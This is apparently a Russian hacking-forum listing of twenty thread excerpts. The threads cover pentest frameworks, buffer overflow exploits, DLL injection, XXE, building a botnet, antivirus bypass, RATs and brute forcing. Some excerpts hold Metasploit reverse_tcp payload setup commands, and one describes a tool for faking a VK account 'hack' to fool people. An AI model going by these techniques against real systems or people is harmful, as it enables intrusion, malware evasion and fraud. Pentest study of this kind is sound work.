hack

  1. Vander

    Статья Hakku Framework

    Привет всем! В этой статье, я хочу познакомить вас с небольшим, простеньким фреймворком для проведения тестов на проникновение, под названием - Hakku Framework Penetration Test Tools. You must be registered for see element. Hakku фреймворк имеет простую структуру, предполагает наличие базовых...
  2. SooLFaa

    Статья Обман в вконтакте: как мошенники имитируют кражу аккаунтов

    Попросил меня мой хороший товарищ, написать такую программу, которая будет менять вёрстку в браузере на лету, дабы похвастаться перед друзьями сколько много у него денег на счету или обмануть каких - нибудь людей "взломом вк". Казалось бы, "Да чё нам стоит - дом построить", залез в исходный код...
  3. Сергей Попов

    Статья Создание Эксплойта: Переполнение буфера стека

    Переполнение буфера стека происходит, когда программа записывает больше данных для стека, чем было выделено для буфера. Это приводит к перезаписыванию, возможно, важных избыточных данных в стеке и вызывает аварийное завершение или выполнение произвольного кода возможным перезаписыванием...
  4. SooLFaa

    Статья DLL Injection

    Привет господа форумчане. Давненько я не писал, но ничего страшного, скоро решатся пара бытовых проблем и выпуск статей нормализуется по 2 - 3 в неделю. А сегодня, мы поговорим немного не мало о технике DLL Инъекций и рассмотрим пару примеров. Итак что такое DLL Инъекция? Это тип атаки...
  5. Vander

    Wi-Fi-Pumpkin v0.8.4

    Всем привет! Рассмотрим в этой статье новую версию утилиты для пентестинга беспроводных сетей WiFi-Pumpkin v0.8.4, обновление вышло недавно, 22.12.2016. Я полагаю, с предыдущими версиями многие знакомы, поэтому мы не будем заострять внимание на применении этого инструмента, а сразу перейдем к...
  6. Vander

    Статья Тест на проникновение с помощью Exploit Pack

    Привет всем! В этой статье мы займемся тестированием на проникновение с помощью свежего инструмента под названием Exploit Pack. Это можно сказать фреймворк, имеющий довольно подробный и user friendly графический интерфейс. Он не предполагает знание пользователем командной строки. You must be...
  7. SooLFaa

    Статья XXE

    И снова всем привет. А сегодня будет разговор об XXE – атаках, что это, почему, зачем, а главное посмотрим нагрузки и пример в .Net приложениях. Идея уязвимости в том, что мы используем внешние сущности при парсинге xml файлов, рассмотрим сразу пример. Создадим файл index.php у себя на...
  8. SooLFaa

    Статья Создание распределенных сетевых систем: исследование архитектуры и управления

    Часть 1 Часть 2 You must be registered for see element. Добрый вечер господа. Сегодня я хотел бы поговорить не о взломе в чистом виде. Я думаю пришло время нам с Вами создать собственный БОТНЕТ. Эта тема, является не новой, но я бы хотел обратить внимание на то как именно начать создавать...
  9. SooLFaa

    Статья AV ByPass с помощью C#

    Привет. Господа хекеры. Рассмотрим вариант байпасса антивирусов с помощью языка C#. Обо всё предлагаю по порядку и для начала сгенерируем полезную нагрузку в метасплоите. use windows/meterpreter/reverse_tcp You must be registered for see element. Устанавливаем опции set LHOST 192.168.1.237 set...
  10. SooLFaa

    Поднимаем свой хекерский маленький сервер

    Приветствую Вас господа, сегодня мы поговорим о вечном. А именно как создать маленькую станцию для хека всего за 6000р. Собственно, начнем с основ и разберемся для чего нам это надо: 1) Неудобно каждый раз пускать виртуалку; 2) Меньше нагрузка для поддержки двух систем; 3) Возможность...
  11. Vander

    Статья Pythem – Penetration Testing Framework.

    Всем привет! В этой статье я хочу показать довольно новый инструмент для проведения тестирования на проникновение. Называется он Pythem – Penetration Testing Framework. Framework написан на языке Python, что, позволяет легко кастомизировать его под свои цели. Список изменений в версии: PytheM...
  12. Vander

    Статья DKMC - Dont Kill My Cat (bmp + shell)

    Привет! В этой теме речь пойдет о небольшой утилите, целью которой является создание вредоносного .bmp файла, и генерация шеллкодов. Называется она DKMC – Don’t Kill My Cat. You must be registered for see element. Установим ее с Github: > git clone You must be registered for see element...
  13. C

    Статья THC-Hydra инструкция для чайников

    Hydra нельзя отнести к простым и легко дающимся новичкам. Не надо отчаиваться, если вам не удалось оседлать hydra, я рекомендую вам посмотреть на программу BruteX. Она автоматизирует процесс подбора, более того, она использует ту же самую hydra, но сама вводит необходимые ключи и не нужно искать...
  14. <~DarkNode~>

    PowerShell для хакера (часть I )

    Часть 1 You must be registered for see element. You must be registered for see element. Приветствую Вас колеги. Как Вы уже поняли речь пойдет о знакомствах с базовыми возможностями PowerShell и области применения хакерских техних. И начнем мы пожалуй сегодня с использования скриптов PowerSploit...
  15. <~DarkNode~>

    Статья Обход антивируса с помощью ctypes (python)

    Привет колеги. Сегодня покажу очень простенький пример обхода антивируса с помощью библиотеки ctypes в языке программирования python. Суть обхода в том эта библиотека дает нам возможность выполнять код C|C++ в питоновском скрипте. И мы смело сможем запустить шеллкод метасплоита в оперативной...
  16. <~DarkNode~>

    Статья Быстрый способ получить meterpreter

    Привет колеги. ) Сегодня речь пойдет непосредственно о пост эксплуатации скомпрометированной системы (когда у нас есть командная строка удаленной windows машины от windows 7) и нам нужно расширить функционал своих возможностей с помощью метерпретер сессии метаслоита. Для этого нам отлично...
  17. <~DarkNode~>

    PUPY Remote Administration Tool (RAT)

    Сегодня посмотрим ,на мой взгляд , довольно таки не плохой мультиплатформенный RAT на питоне c очень большим функционалом. Pupy может использовать различные протоколы шифрования для комуникации с жертвой (SSL,HTTP,RSA,obfs3,scramblesuit), мигрировать в процессы (reflective injection)...
  18. X

    Направьте что и где изучать ?

    Доброго времени суток. Начинаю разбираться в пентесте, начал с Wi-Fi, всё получается по гайдам, но не моё по гайдам ходить. Собственно сабж: Какие книги\статьи читать для развития в эту сторону ? Какие ресурсы посоветуете, кроме вашего) Желательно рус. Интересует: 1) Сеть, сайты. 2) Уязвимости в...
  19. S

    Выбор/подбор железа для брута

    Захотел себе собрать машину, для брут'ов. :) Кто может посоветовать подобрать железо для таких целей? На что надо делать больше упор? Какое правильное соотношения всех частей железа? И так далее.. Бюджет, например, $5-7к. з.ы. Стоит ли брать видеокарту для того, чтобы брутить через нее, на...
  20. Vander

    Статья Взлом удаленного ПК: HTA-server

    Всем привет! В этой статье я хочу показать взлом удаленного компьютера, а точнее, получение сессии meterpreter c помощью эксплойта - hta_server. You must be registered for see element. Появился он недавно в версии Metasploit Framework v4.12.34, You must be registered for see element. так...